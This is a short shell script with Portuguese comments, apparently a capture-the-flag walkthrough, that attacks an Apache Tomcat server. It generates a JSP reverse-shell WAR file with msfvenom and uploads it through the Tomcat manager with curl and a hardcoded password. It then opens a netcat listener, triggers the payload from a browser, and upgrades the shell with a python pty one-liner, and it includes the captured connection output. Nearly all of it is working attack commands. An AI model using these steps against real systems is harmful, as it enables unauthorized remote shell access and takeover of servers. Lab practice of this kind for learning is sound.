sh_MSFvenom
echo "-------------------------------------CRIANDO UM EXPLOID COM MSFVENOM----------------------------------------------------"
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.29 LPORT=4444 -f war > exploit.war
#IP do seu local host + porta
#Criação do arquivo .WAR
echo "-------------------------------------UPLOAD DO EXPLOIT NO ALVO---------------------------------------------------------"
curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file exploit.war "http://10.10.10.194:8080/manager/text/deploy?path=/exploit.war"
#O ataque foi em um alvo cujo tomcat9 estava vulneravel
#IP do RHOST(alvo) + porta da aplicação
#upload do arquivo .war
echo "------------------------------------sucesso no upload -----------------------------------------------------"
echo "-----------------------------------Se conectando ao netcat---------------------------------------------------------"
echo "----------------------------------- http://10.10.10.194:8080/exploit.war ---------------------------------------------"
nc -nvlp 4444
#em outra aba do terminal, deixe escutando na porta que desejar
# nc -nvlp 4444
Quando estiver ouvindo a porta, vá no navegador e chame o arquivo que você acabou de fazer o upload
http://10.10.10.194:8080/exploit.war/
volte no terminal, ele vai ter conectado via shell agora execute o shell reverso em python para o term
listening on [any] 4444 … connect to [10.10.14.29] from (UNKNOWN) [10.10.10.194] 50476
$ python3 -c "import pty;pty.spawn('/bin/bash')"